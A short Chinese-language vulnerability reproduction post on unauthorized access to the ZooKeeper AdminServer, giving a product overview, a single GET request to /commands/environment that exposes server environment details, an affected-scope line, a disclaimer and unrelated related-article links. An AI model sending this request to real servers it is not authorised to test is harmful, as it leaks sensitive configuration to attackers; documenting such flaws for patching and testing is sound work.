【漏洞复现】zookeeper AdminServer 未授权访问漏洞

0x01 产品简介

ZooKeeper 是一个集中式服务,用于维护配置信息、命名、提供分布式同步和提供组服务。ZooKeeper的AdminServer是其管理界面的一部分,通常用于监控ZooKeeper集群的状态和执行一些管理操作。AdminServer提供了Web-based的管理和监控功能,使得管理员能够方便地查看集群的健康状态、配置信息、以及执行一些管理任务。

0x02 漏洞概述

ZooKeeper AdminServer 存在未授权访问漏洞,未授权的攻击者可以通过该漏洞获取服务器大量敏感信息。

0x03 测绘语句

复制代码
N/A

0x04 漏洞复现

复制代码
GET /commands/environment HTTP/1.1

0x05 影响范围

复制代码
ZooKeeper AdminServer

0x06 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
河码匠6 分钟前
Kubernests YAML 详细之卷(PV、PVC、StorageClass)
云原生·容器·kubernetes
码上上班44 分钟前
k8s控制器,daemonset
云原生·容器·kubernetes
rannn_1111 小时前
【Redis|实战篇4】黑马点评|分布式锁
java·数据库·redis·分布式·后端
mcooiedo1 小时前
RabbitMQ高级特性----生产者确认机制
分布式·rabbitmq
Thomas.Sir2 小时前
深入剖析 Redis 的三种集群方式以及实战配置
redis·分布式·集群·高可用
0xDevNull2 小时前
RabbitMQ 完整技术指南
分布式·rabbitmq
深念Y2 小时前
Docker Desktop 版本与 IDEA 插件兼容性
docker·云原生·容器·api·idea·wsl
姓蔡小朋友3 小时前
RabbitMQ
分布式·rabbitmq
深蓝轨迹3 小时前
Redis 分布式锁实现流程
数据库·redis·分布式
llm大模型算法工程师weng3 小时前
AI + Docker + K8s:云原生时代的运维提效实战
运维·人工智能·云原生